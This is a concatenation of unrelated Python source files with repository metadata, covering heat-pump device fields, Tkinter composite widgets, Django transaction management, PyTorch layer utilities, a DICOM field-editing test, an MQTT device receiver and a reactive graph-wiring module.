hot_water_energy_consumed_rate_1: int
hot_water_energy_consumed_rate_2: int
hot_water_energy_produced_rate_1: int
hot_water_energy_produced_rate_2: int
idle_zone_1: bool
idle_zone_2: bool
image_id: int
immersion_heater_status: bool
installation_date: datetime
is_FTC_model_supported: bool
last_effective_flags: int
last_FTC_revision: str
last_FTC_version: int
last_reset: datetime
last_service_date: datetime
last_time_stamp: datetime
local_ip_address: str
location: int
mac_address: str
max_indoor_units: int
max_outdoor_units: int
max_pcycle: int
max_set_temperature: int
max_tank_temperature: int
max_temperature: int
max_temperature_control_units: int
min_pcycle: int
min_set_temperature: int
min_temperature: int
offline: bool
operation_mode: int
operation_mode_zone_1: int
operation_mode_zone_2: int
outdoor_temperature: int
owner: object # ???
owner_country: int
owner_email: str
owner_id: int
owner_name: str
passcode: object # ???
pcycle: int
pending_request_special_functions: int
pending_send_special_functions: int
position: str
power: bool
prohibit_cooling_zone_1: bool
prohibit_cooling_zone_2: bool
prohibit_heating_zone_1: bool
prohibit_heating_zone_2: bool
prohibit_hot_water: bool
protocol_version: int
rate_1_start_time: object # ???
rate_2_start_time: object # ???
record_num_max: int
refrigerant_address: int
registrations: int
registration_reason: object # ???
registration_retry: object # ???
request_special_functions: int
return_temperature: int
return_temperature_boiler: int
return_temperature_zone_1: int
return_temperature_zone_2: int
room_temperature_zone_1: float
room_temperature_zone_2: float
scene: object # ???
secondary_zone_heat_curve: bool
send_special_functions: int
serial_number: int
server_communication_disabled: bool
server_timer_desired: bool
server_timer_enabled: bool
set_cool_flow_temperature_zone_1: int
set_cool_flow_temperature_zone_2: int
set_heat_flow_temperature_zone_1: int
set_heat_flow_temperature_zone_2: int
set_tank_water_temperature: int
set_temperature_zone_1: int
set_temperature_zone_2: int
special_functions_state: int
SP_timeout: object # ???
SSL_expiration_date: object # ???
tank_water_temperature: int
target_hc_temperature_zone_1: int
target_hc_temperature_zone_2: int
temperature_increment: float
temperature_increment_override: int
thermostat_status_zone_1: bool
thermostat_status_zone_2: bool
thermostat_temperature_zone_1: int
thermostat_temperature_zone_2: int
thermostat_type_zone_1: bool
thermostat_type_zone_2: bool
timezone: int
timezone_id: int
type: int
unit_status: int
unit_version: int
valve_status_2_way: bool
valve_status_2_way_2a: bool
valve_status_2_way_2b: bool
valve_status_3_way: bool
water_pump_1_status: bool
water_pump_2_status: bool
water_pump_3_status: bool
water_pump_4_status: bool
wifi_adapter_status: str # Enum later???
wifi_signal_strength: int
zone_1_in_cool_mode: bool
zone_1_in_heat_mode: bool
zone_1_in_room_mode: bool
zone_1_name: str
zone_2_in_cool_mode: bool
zone_2_in_heat_mode: bool
zone_2_in_room_mode: bool
zone_2_master: bool
zone_2_name: str
presets: List[Preset]
has_pending_command: bool = None
last_communication: datetime = None
next_communication: datetime = None
prohibit_zone1: bool = None
prohibit_zone2: bool = None
scene_owner: object = None # ???
weather_observations: List[WeatherObservation] = None
def update_from_device_info(self, data):
if self.weather_observations is None:
self.weather_observations = []
self.weather_observations.clear()
self.has_pending_command = data["has_pending_command"]
self.last_communication = str_to_datetime(data["last_communication"])
self.next_communication = str_to_datetime(data["next_communication"])
self.prohibit_zone1 = data["prohibit_zone1"]
self.prohibit_zone2 = data["prohibit_zone2"]
self.scene_owner = data["scene_owner"]
for observation in data["weather_observations"]:
self.weather_observations.append(WeatherObservation(**observation))
| 30.141176 | 79 | 0.749024 |
f45c013457f2e9a5333876fe34105550b82152d6 | 4,622 | py | Python | composite.py | junkmd/Python-Tkinter-Widgets | b1f17d64ac7c7e9607722dbb27bbf7db3ac13242 | [
"MIT"
] | 1 | 2020-08-08T09:04:11.000Z | 2020-08-08T09:04:11.000Z | composite.py | junkmd/Python-Tkinter-Widgets | b1f17d64ac7c7e9607722dbb27bbf7db3ac13242 | [
"MIT"
] | null | null | null | composite.py | junkmd/Python-Tkinter-Widgets | b1f17d64ac7c7e9607722dbb27bbf7db3ac13242 | [
"MIT"
] | null | null | null | """Tkinter combination widgets' base classes."""
import tkinter as tk
from tkinter import ttk
TK_GEOMETRY_METHODS = tuple(set([
m for m in
list(tk.Pack.__dict__.keys()) +
list(tk.Grid.__dict__.keys()) +
list(tk.Place.__dict__.keys())
if m[0] != '_' and m != 'config' and m != 'configure'
]))
class CompositeWidgetError(tk.TclError):
pass
class InteriorAndExterior:
"""Internal class."""
def __init__(self, exterior):
self._exterior = exterior
if self not in exterior.winfo_children():
raise CompositeWidgetError(
"Interior must be childrens of Exterior.")
for m in TK_GEOMETRY_METHODS:
setattr(self, m, getattr(exterior, m))
self._base = self.__class__.mro()[1] # Base class of composite widget.
if not issubclass(self._base, tk.Widget):
raise CompositeWidgetError(
"Base class of composite widget "
"must be subclass of tk.BaseWidget.")
inter_keys = self._base.keys(self)
exter_keys = exterior.keys()
common_keys = list(set(inter_keys) & set(exter_keys))
inter_only = list(set(inter_keys) - set(exter_keys))
exter_only = list(set(exter_keys) - set(inter_keys))
c_kw, i_kw, e_kw = {}, {}, {}
for keys, kw in zip(
[common_keys, inter_only, exter_only],
[c_kw, i_kw, e_kw]):
for k in keys:
kw[k] = k
self._common_kw = c_kw
self._interior_kw, self._exterior_kw = i_kw, e_kw
self.winfo_parent = exterior.winfo_parent
self.config = self.configure = self.__configure
self._base.__setitem__ = self.__setitem
self.keys = self.__keys
self.cget = self.__cget
self._base.__getitem__ = self.__cget
self.destroy = self.__destroy
def __dispatch_each_options(self, **kw):
"""Internal function.
Returns interior, exterior option."""
inter_opts, exter_opts = {}, {}
for k, v in kw.items():
if k in self._common_kw.keys():
inter_opts[self._common_kw[k]] = kw[k]
exter_opts[self._common_kw[k]] = kw[k]
elif k in self._interior_kw.keys():
inter_opts[self._interior_kw[k]] = kw[k]
elif k in self._exterior_kw.keys():
exter_opts[self._exterior_kw[k]] = kw[k]
else:
raise tk.TclError('unknown option \"%s\"' % ('-' + k, ))
return (inter_opts, exter_opts)
def __destroy(self):
"""Destroy this and all descendants widgets."""
# Destroy self._exterior and its children widgets including interior.
# For avoiding RecursionError,
# removing self(interior) from self._exterior.children and
# destroy the interior and its children widgets
# before self._exterior.destroy() method will destroy the interior.
del_dict = {} # deleting from self._exterior.children dictionary
for k, v in self._exterior.children.items():
if v is self:
del_dict[k] = v
for k, v in del_dict.items():
del self._exterior.children[k]
self._base.destroy(self)
self._exterior.destroy()
def __keys(self):
"""Return a list of all resource names of this widget."""
inter = self._interior_kw.keys()
exter = self._exterior_kw.keys()
common = self._common_kw.keys()
keys = list(set(list(inter) + list(exter) + list(common)))
keys.sort()
return keys
def __configure(self, **kw):
"""Configure resources of a widget.
The values for resources are specified as keyword
arguments. To get an overview about
the allowed keyword arguments call the method keys."""
inter_kw, exter_kw = self.__dispatch_each_options(**kw)
self._exterior.config(**exter_kw)
self._base.config(self, **inter_kw)
def __setitem(self, key, value):
self.__configure(**{key: value})
def __cget(self, key):
"""Return the resource value for a KEY given as string."""
if key in self._common_kw.keys():
return self._base.cget(self, self._common_kw[key])
else:
if key in self._interior_kw.keys():
return self._base.cget(self, self._interior_kw[key])
elif key in self._exterior_kw.keys():
return self._exterior.cget(self._exterior_kw[key])
else:
raise CompositeWidgetError('unknown option \"-%s\"' % key)
| 37.577236 | 79 | 0.599091 |
7061475a3c45c3011b931a16c8e9ca8d9a47be35 | 13,752 | py | Python | django/db/transaction.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 3 | 2016-07-08T23:49:32.000Z | 2018-04-15T22:55:01.000Z | django/db/transaction.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 27 | 2017-02-05T15:57:04.000Z | 2018-04-15T22:57:26.000Z | django/db/transaction.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | null | null | null | """
This module implements a transaction manager that can be used to define
transaction handling in a request or view function. It is used by transaction
control middleware and decorators.
The transaction manager can be in managed or in auto state. Auto state means the
system is using a commit-on-save strategy (actually it's more like
commit-on-change). As soon as the .save() or .delete() (or related) methods are
called, a commit is made.
Managed transactions don't do those commits, but will need some kind of manual
or implicit commits or rollbacks.
"""
import sys
try:
import thread
except ImportError:
import dummy_thread as thread
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.conf import settings
from django.db import connections, DEFAULT_DB_ALIAS
class TransactionManagementError(Exception):
"""
This exception is thrown when something bad happens with transaction
management.
"""
pass
# The states are dictionaries of dictionaries of lists. The key to the outer
# dict is the current thread, and the key to the inner dictionary is the
# connection alias and the list is handled as a stack of values.
state = {}
savepoint_state = {}
# The dirty flag is set by *_unless_managed functions to denote that the
# code under transaction management has changed things to require a
# database commit.
# This is a dictionary mapping thread to a dictionary mapping connection
# alias to a boolean.
dirty = {}
def enter_transaction_management(managed=True, using=None):
"""
Enters transaction management for a running thread. It must be balanced with
the appropriate leave_transaction_management call, since the actual state is
managed as a stack.
The state and dirty flag are carried over from the surrounding block or
from the settings, if there is no surrounding block (dirty is always false
when no current block is running).
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
state[thread_ident][using].append(state[thread_ident][using][-1])
else:
state.setdefault(thread_ident, {})
state[thread_ident][using] = [settings.TRANSACTIONS_MANAGED]
if thread_ident not in dirty or using not in dirty[thread_ident]:
dirty.setdefault(thread_ident, {})
dirty[thread_ident][using] = False
connection._enter_transaction_management(managed)
def leave_transaction_management(using=None):
"""
Leaves transaction management for a running thread. A dirty flag is carried
over to the surrounding block, as a commit will commit all changes, even
those from outside. (Commits are on connection level.)
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._leave_transaction_management(is_managed(using=using))
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
del state[thread_ident][using][-1]
else:
raise TransactionManagementError("This code isn't under transaction management")
if dirty.get(thread_ident, {}).get(using, False):
rollback(using=using)
raise TransactionManagementError("Transaction managed block ended with pending COMMIT/ROLLBACK")
dirty[thread_ident][using] = False
def is_dirty(using=None):
"""
Returns True if the current transaction requires a commit for changes to
happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
return dirty.get(thread.get_ident(), {}).get(using, False)
def set_dirty(using=None):
"""
Sets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether there are open
changes waiting for commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = True
else:
raise TransactionManagementError("This code isn't under transaction management")
def set_clean(using=None):
"""
Resets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether a commit or rollback
should happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = False
else:
raise TransactionManagementError("This code isn't under transaction management")
clean_savepoints(using=using)
def clean_savepoints(using=None):
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
del savepoint_state[thread_ident][using]
def is_managed(using=None):
"""
Checks whether the transaction manager is in manual or in auto state.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in state and using in state[thread_ident]:
if state[thread_ident][using]:
return state[thread_ident][using][-1]
return settings.TRANSACTIONS_MANAGED
def managed(flag=True, using=None):
"""
Puts the transaction manager into a manual state: managed transactions have
to be committed explicitly by the user. If you switch off transaction
management and there is a pending commit/rollback, the data will be
commited.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
top = state.get(thread_ident, {}).get(using, None)
if top:
top[-1] = flag
if not flag and is_dirty(using=using):
connection._commit()
set_clean(using=using)
else:
raise TransactionManagementError("This code isn't under transaction management")
def commit_unless_managed(using=None):
"""
Commits changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._commit()
clean_savepoints(using=using)
else:
set_dirty(using=using)
def rollback_unless_managed(using=None):
"""
Rolls back changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._rollback()
else:
set_dirty(using=using)
def commit(using=None):
"""
Does the commit itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._commit()
set_clean(using=using)
def rollback(using=None):
"""
This function does the rollback itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._rollback()
set_clean(using=using)
def savepoint(using=None):
"""
Creates a savepoint (if supported and required by the backend) inside the
current transaction. Returns an identifier for the savepoint that will be
used for the subsequent rollback or commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
savepoint_state[thread_ident][using].append(None)
else:
savepoint_state.setdefault(thread_ident, {})
savepoint_state[thread_ident][using] = [None]
tid = str(thread_ident).replace('-', '')
sid = "s%s_x%d" % (tid, len(savepoint_state[thread_ident][using]))
connection._savepoint(sid)
return sid
def savepoint_rollback(sid, using=None):
"""
Rolls back the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_rollback(sid)
def savepoint_commit(sid, using=None):
"""
Commits the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_commit(sid)
##############
# DECORATORS #
##############
class Transaction(object):
"""
Acts as either a decorator, or a context manager. If it's a decorator it
takes a function and returns a wrapped function. If it's a contextmanager
it's used with the ``with`` statement. In either event entering/exiting
are called before and after, respectively, the function/block is executed.
autocommit, commit_on_success, and commit_manually contain the
implementations of entering and exiting.
"""
def __init__(self, entering, exiting, using):
self.entering = entering
self.exiting = exiting
self.using = using
def __enter__(self):
self.entering(self.using)
def __exit__(self, exc_type, exc_value, traceback):
self.exiting(exc_value, self.using)
def __call__(self, func):
@wraps(func)
def inner(*args, **kwargs):
# Once we drop support for Python 2.4 this block should become:
# with self:
# func(*args, **kwargs)
self.__enter__()
try:
res = func(*args, **kwargs)
except:
self.__exit__(*sys.exc_info())
raise
else:
self.__exit__(None, None, None)
return res
return inner
def _transaction_func(entering, exiting, using):
"""
Takes 3 things, an entering function (what to do to start this block of
transaction management), an exiting function (what to do to end it, on both
success and failure, and using which can be: None, indiciating using is
DEFAULT_DB_ALIAS, a callable, indicating that using is DEFAULT_DB_ALIAS and
to return the function already wrapped.
Returns either a Transaction objects, which is both a decorator and a
context manager, or a wrapped function, if using is a callable.
"""
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return Transaction(entering, exiting, DEFAULT_DB_ALIAS)(using)
return Transaction(entering, exiting, using)
def autocommit(using=None):
"""
Decorator that activates commit on save. This is Django's default behavior;
this decorator is useful if you globally activated transaction management in
your settings file and want the default behavior in some view functions.
"""
def entering(using):
enter_transaction_management(managed=False, using=using)
managed(False, using=using)
def exiting(exc_value, using):
leave_transaction_management(using=using)
return _transaction_func(entering, exiting, using)
def commit_on_success(using=None):
"""
This decorator activates commit on response. This way, if the view function
runs successfully, a commit is made; if the viewfunc produces an exception,
a rollback is made. This is one of the most common ways to do transaction
control in Web apps.
"""
def entering(using):
enter_transaction_management(using=using)
managed(True, using=using)
def exiting(exc_value, using):
try:
if exc_value is not None:
if is_dirty(using=using):
rollback(using=using)
else:
if is_dirty(using=using):
try:
commit(using=using)
except:
rollback(using=using)
raise
finally:
leave_transaction_management(using=using)
return _transaction_func(entering, exiting, using)
def commit_manually(using=None):
"""
Decorator that activates manual transaction control. It just disables
automatic transaction control and doesn't do any commit/rollback of its
own -- it's up to the user to call the commit and rollback functions
themselves.
"""
def entering(using):
enter_transaction_management(using=using)
managed(True, using=using)
def exiting(exc_value, using):
leave_transaction_management(using=using)
return _transaction_func(entering, exiting, using)
| 36.28496 | 105 | 0.669066 |
cb2fd4c779152e90b7ffa00aba726562c13975c5 | 2,997 | py | Python | mmdet/models/utils/layer_utils.py | nob87208/LADet | 353cc6bd358de92a2a0242f594b08d15947e7560 | [
"Apache-2.0"
] | 1 | 2020-08-13T02:55:59.000Z | 2020-08-13T02:55:59.000Z | mmdet/models/utils/layer_utils.py | nob87208/LADet | 353cc6bd358de92a2a0242f594b08d15947e7560 | [
"Apache-2.0"
] | null | null | null | mmdet/models/utils/layer_utils.py | nob87208/LADet | 353cc6bd358de92a2a0242f594b08d15947e7560 | [
"Apache-2.0"
] | 2 | 2020-04-13T11:34:24.000Z | 2022-03-29T07:46:27.000Z | import torch
import warnings
import torch.nn as nn
from mmcv.cnn import kaiming_init, constant_init
from .norm import build_norm_layer
def Reorder(x, groups):
batchsize, num_channels, height, width = x.data.size()
channels_per_group = num_channels // groups
# reshape
x = x.view(batchsize, groups,
channels_per_group, height, width)
# transpose
# - contiguous() required if transpose() is used before view().
# See https://github.com/pytorch/pytorch/issues/764
x = torch.transpose(x, 1, 2).contiguous()
# flatten
x = x.view(batchsize, -1, height, width)
return x
class IGCv3_block(nn.Module):
def __init__(self, inp, oup, stride, expand_ratio):
super(IGCv3_block, self).__init__()
self.stride = stride
assert stride in [1, 2]
self.conv = nn.Sequential(
# pw
nn.Conv2d(inp, inp * expand_ratio,kernel_size = 1, stride= 1, padding=0,groups = 2, bias=False),
nn.BatchNorm2d(inp * expand_ratio),
nn.ReLU6(inplace=True),
#permutation
PermutationBlock(groups=2),
# dw
nn.Conv2d(inp * expand_ratio, inp * expand_ratio, kernel_size =3, stride= stride, padding=1, groups=inp * expand_ratio, bias=False),
nn.BatchNorm2d(inp * expand_ratio),
nn.ReLU6(inplace=True),
# pw-linear
nn.Conv2d(inp * expand_ratio, oup, kernel_size =1, stride= 1, padding=0,groups = 2, bias=False),
nn.BatchNorm2d(oup),
# permutation
PermutationBlock(groups= int(round((oup/2)))),
)
def forward(self, x):
return self.conv(x)
class Class_predict(nn.Module):
def __init__(self, feat_channels, num_anchors, cls_out_channels, bn=True):
super(Class_predict, self).__init__()
self.num_anchors = num_anchors
self.cls_out_channels = cls_out_channels
self.bn = bn
self.feat_channels = feat_channels
self.conv1 = nn.Conv2d(
feat_channels,
self.num_anchors * self.cls_out_channels,
(1, 3),
stride=1,
padding=(0, 1),
groups=self.cls_out_channels)
if self.bn:
self.bn1 = nn.BatchNorm2d(self.num_anchors * self.cls_out_channels)
self.conv2 = nn.Conv2d(
self.num_anchors * self.cls_out_channels,
self.num_anchors * self.cls_out_channels,
(3, 1),
stride=1,
padding=(1, 0),
groups=self.cls_out_channels)
def forward(self, x):
y = self.conv1(x)
if self.bn:
y = self.bn1(y)
y = Reorder(y, self.cls_out_channels)
y = self.conv2(y)
return y | 35.258824 | 145 | 0.549883 |
db8a17896202360e73a75a40248e87496bb53e2f | 75 | py | Python | rtsa-gui.py | Sout/pyrf | 6412d5630707632f61cfa2fae8ceafad580a207d | [
"BSD-3-Clause"
] | null | null | null | rtsa-gui.py | Sout/pyrf | 6412d5630707632f61cfa2fae8ceafad580a207d | [
"BSD-3-Clause"
] | null | null | null | rtsa-gui.py | Sout/pyrf | 6412d5630707632f61cfa2fae8ceafad580a207d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from pyrf.gui.spectrum_analyzer import main
main()
| 12.5 | 43 | 0.76 |
069578e5c4b11b411ddb05ee3eb20bad769971be | 2,669 | py | Python | 3rd-party/gdcm/Testing/Source/MediaStorageAndFileFormat/Python/TestModifyFields.py | oprogramadorreal/vize | 042c16f96d8790303563be6787200558e1ec00b2 | [
"MIT"
] | 47 | 2020-03-30T14:36:46.000Z | 2022-03-06T07:44:54.000Z | 3rd-party/gdcm/Testing/Source/MediaStorageAndFileFormat/Python/TestModifyFields.py | oprogramadorreal/vize | 042c16f96d8790303563be6787200558e1ec00b2 | [
"MIT"
] | null | null | null | 3rd-party/gdcm/Testing/Source/MediaStorageAndFileFormat/Python/TestModifyFields.py | oprogramadorreal/vize | 042c16f96d8790303563be6787200558e1ec00b2 | [
"MIT"
] | 8 | 2020-04-01T01:22:45.000Z | 2022-01-02T13:06:09.000Z | ############################################################################
#
# Program: GDCM (Grassroots DICOM). A DICOM library
#
# Copyright (c) 2006-2011 Mathieu Malaterre
# All rights reserved.
# See Copyright.txt or http://gdcm.sourceforge.net/Copyright.html for details.
#
# This software is distributed WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the above copyright notice for more information.
#
############################################################################
import gdcm
import os,sys
def TestModifyFields(filename):
outfilename = filename + ".rewrite"
r = gdcm.Reader()
r.SetFileName( filename )
sucess = r.Read()
#print r.GetFile().GetDataSet()
ds = r.GetFile().GetDataSet()
#print dir(ds)
# eg, let's remove a tag
removetag = gdcm.Tag(0x0043,0x106f)
if ds.FindDataElement( removetag ):
ds.Remove( removetag )
# let's replace a value:
replacetag = gdcm.Tag(0x0010,0x0010)
if ds.FindDataElement( replacetag ):
de = ds.GetDataElement( replacetag )
#print dir(de)
patname = "This^is^an^example"
vl = gdcm.VL( len(patname) )
de.SetByteValue( patname, vl )
# let's insert a new dataelement
# <entry group="0012" element="0062" vr="CS" vm="1" name="Patient Identity Removed"/>
pir = gdcm.DataElement( gdcm.Tag(0x0012,0x0062) )
pir.SetVR( gdcm.VR( gdcm.VR.CS ) ) # specify the VR explicitely
yes = "YES"
pir.SetByteValue( yes, gdcm.VL(len(yes)) )
ds.Insert( pir )
# try again but pretend we don't know the VR
# <entry group="0012" element="0063" vr="LO" vm="1-n" name="De-identification Method"/>
deidmethod = gdcm.Tag(0x0012,0x0063)
# retrieve the supreme global instance, sum of all knowledge in da whole universe:
dicomdicts = gdcm.GlobalInstance.GetDicts()
dictel = dicomdicts.GetDictEntry( deidmethod )
#print dictel.GetVR()
deid = gdcm.DataElement( deidmethod )
deid.SetVR( dictel.GetVR() )
methodstr = "Well known Company"
#deid.SetByteValue( methodstr, gdcm.VL(len(methodstr)) )
deid.SetByteValue( methodstr, gdcm.VL(len(methodstr)) )
ds.Insert( deid )
#w = gdcm.Writer()
#w.SetFileName( outfilename )
#w.SetFile( r.GetFile() )
#sucess = w.Write()
return sucess
if __name__ == "__main__":
sucess = 0
try:
filename = os.sys.argv[1]
sucess += TestModifyFields( filename, True )
except:
# loop over all files:
t = gdcm.Testing()
nfiles = t.GetNumberOfFileNames()
for i in range(0,nfiles):
filename = t.GetFileName(i)
sucess += TestModifyFields( filename )
# Test succeed ?
sys.exit(sucess == 0)
| 31.4 | 89 | 0.644061 |
e6a4db12615f9ae1c18b4c36fff2225e9cb1355f | 2,612 | py | Python | src/receive_devices.py | EdrianI/openeew-seismology | 163b6447d125c88bd31fdad938893edb8910e790 | [
"Apache-2.0"
] | null | null | null | src/receive_devices.py | EdrianI/openeew-seismology | 163b6447d125c88bd31fdad938893edb8910e790 | [
"Apache-2.0"
] | null | null | null | src/receive_devices.py | EdrianI/openeew-seismology | 163b6447d125c88bd31fdad938893edb8910e790 | [
"Apache-2.0"
] | null | null | null | """This script receives device data from MQTT by subscribing to the iot-2/type/OpenEEW/id/+/mon"""
import json
from argparse import ArgumentParser
from paho.mqtt.client import Client as MqttClient
class DeviceReceiver:
"""This class subscribes to the MQTT and receivces raw data"""
def __init__(self, df_receivers) -> None:
"""Initializes the DataReceiver object"""
super().__init__()
self.df_receivers = df_receivers
def run(self):
"""Main method that parses command options and executes the rest of the script"""
parser = ArgumentParser()
parser.add_argument("--username", help="MQTT username")
parser.add_argument("--password", help="MQTT password")
parser.add_argument(
"--clientid", help="MQTT clientID", default="recieve_devices_simulator"
)
parser.add_argument(
"--host",
help="MQTT host",
nargs="?",
const="localhost",
default="localhost",
)
parser.add_argument(
"--port", help="MQTT port", nargs="?", type=int, const=1883, default=1883
)
arguments = parser.parse_args()
client = self.create_client(
arguments.host,
arguments.port,
arguments.username,
arguments.password,
arguments.clientid,
)
client.loop_forever()
def create_client(self, host, port, username, password, clientid):
"""Creating an MQTT Client Object"""
client = MqttClient(clientid)
if username and password:
client.username_pw_set(username=username, password=password)
client.on_connect = self.on_connect
client.on_message = self.on_message
client.connect(host=host, port=port)
return client
def on_connect(self, client, userdata, flags, resultcode):
"""Upon connecting to an MQTT server, subscribe to a topic
the production topic is 'iot-2/type/OpenEEW/id/+/mon'"""
topic = "iot-2/type/OpenEEW/id/+/mon"
print(f"✅ Subscribed to devices with result code {resultcode}")
client.subscribe(topic)
def on_message(self, client, userdata, message):
"""When a message is sent to a subscribed topic,
decode the message and send it to another method"""
try:
decoded_message = str(message.payload.decode("utf-8", "ignore"))
data = json.loads(decoded_message)
self.df_receivers.update(data)
except BaseException as exception:
print(exception)
| 34.826667 | 98 | 0.62098 |
5ec368d74dffb9c7a54bd59ebda99b7d9089454b | 100 | py | Python | probed/__main__.py | pyrustic/probed | f47e229f11e5951f7c72d0e539040120f948f86a | [
"MIT"
] | 1 | 2021-11-25T07:11:22.000Z | 2021-11-25T07:11:22.000Z | probed/__main__.py | pyrustic/probed | f47e229f11e5951f7c72d0e539040120f948f86a | [
"MIT"
] | null | null | null | probed/__main__.py | pyrustic/probed | f47e229f11e5951f7c72d0e539040120f948f86a | [
"MIT"
] | null | null | null | def main():
print("https://github.com/pyrustic/probed")
if __name__ == "__main__":
main()
| 14.285714 | 47 | 0.62 |
1ad3608e5e1ffcfa1a68311981bfb5d0cff2bd8f | 4,019 | py | Python | src/python/wiring.py | dulikvor/reactive | 993d0f91a5dbb4ea8dabc240605f46bf35b606e9 | [
"MIT"
] | null | null | null | src/python/wiring.py | dulikvor/reactive | 993d0f91a5dbb4ea8dabc240605f46bf35b606e9 | [
"MIT"
] | null | null | null | src/python/wiring.py | dulikvor/reactive | 993d0f91a5dbb4ea8dabc240605f46bf35b606e9 | [
"MIT"
] | 1 | 2020-07-28T00:00:00.000Z | 2020-07-28T00:00:00.000Z | import sys
from os.path import dirname, join
sys.path.append(join(dirname(__file__), '../../bin/'))
import _pyNode
from datetime import timedelta
class EdgeType(type):
def __getitem__(cls, item):
return Edge(item)
class Edge(metaclass=EdgeType):
__all__ = ['type']
def __init__(self, type):
self.type = type
def idGenerator():
return _pyNode.InputAdapter.generateId()
class OutDescriptorCreator(type):
def __call__(cls, *args, **kwargs):
if cls is OutDescriptor:
return super(OutDescriptorCreator, cls).__call__(*args, **kwargs)
else:
edgeType = None
for arg, (_, value) in zip(args, cls._signature.items()):
if type(value) == Edge and (type(arg) == value.type or value.type == 'T'):
edgeType = type(arg)
elif type(value) == Edge and (type(arg) == value.type or value.type == 'IT'):
_arg = cls.unpackContainer(arg)
edgeType = type(_arg)
else:
cls.validateScalar(arg, value)
if edgeType == None:
raise TypeError('OutDescriptor is missing edge type')
instance = super(OutDescriptorCreator, cls).__call__(idGenerator(), '', edgeType)
setattr(instance, '_args', args)
setattr(instance, '_kwargs', kwargs)
setattr(instance, 'inScore', 0)
setattr(instance, 'nativeNode', instance.create(instance.id))
GraphEngine().addNode(instance)
return instance
def unpackContainer(cls, arg):
while cls.isContainer(arg):
assert len(arg)
arg = arg[0]
return arg
def validateScalar(cls, arg, schemeArg):
if arg == None:
return
while cls.isContainer(arg):
if type(arg) != type(schemeArg):
raise TypeError('mismatch between OutDescriptor parameters - {0} is not instance of {1}'.format(type(arg), type(schemeArg)))
if len(arg) == 0:
return
arg = arg[0]
schemeArg = schemeArg[0]
if type(arg) != schemeArg:
raise TypeError('mismatch between OutDescriptor parameters - {0} is not instance of {1}'.format(type(arg), type(schemeArg)))
def isContainer(cls, arg):
return isinstance(arg, list) or isinstance(arg, tuple) or isinstance(arg, dict)
class OutDescriptorsTuple( tuple ):
pass
class OutDescriptor(metaclass=OutDescriptorCreator):
def __init__(self, id : int, name : str, type, node = None):
self._id = id
self._name = name
self._type = type
self._node = node #owener node
self._consumers = []
def setType(self, type):
if self._type == None:
self._type = type
elif self._type != type:
raise ValueError('Inconsistency with edge data type, new declared type - {0}, original - {1}'.format(type, self._type))
def getType(self):
return self._type
def addConsumer(self, consumer):
consumer.inScore += 1
self._consumers.append(consumer)
def create(self):
pass
@property
def id(self):
return self._id
@property
def node(self):
return self._node
@property
def consumers(self):
return self._consumers
type = property(getType, setType)
class Signature(dict):
pass
def makeOutDescriptor(name, signature, factory):
def create(self, id):
return type(self)._factory.create(*((id,) + self._args), **self._kwargs)
cls = type(name,(OutDescriptor,), {'_factory':factory, '_signature':signature})
setattr(cls, 'create', create)
return cls
const = makeOutDescriptor('const', Signature(value=Edge['T']), _pyNode.ConstNodeFactory)
curve = makeOutDescriptor('curve', Signature(value=Edge['IT'], delta=[timedelta]), _pyNode.CurveNodeFactory)
def __Output__():
pass
from graph_engine import GraphEngine
| 31.155039 | 140 | 0.605126 |
4e3d575f89426a24a333bf84cc036de721453ae0 | 976 | py | Python | Collect/SSEBop/__init__.py | ali1100/wa | 700e5014533c45f38a245c3abdeacc537cb307bc | [
"Apache-2.0"
] | 16 | 2017-04-27T21:22:37.000Z | 2020-10-21T12:57:03.000Z | Collect/SSEBop/__init__.py | ali1100/wa | 700e5014533c45f38a245c3abdeacc537cb307bc | [
"Apache-2.0"
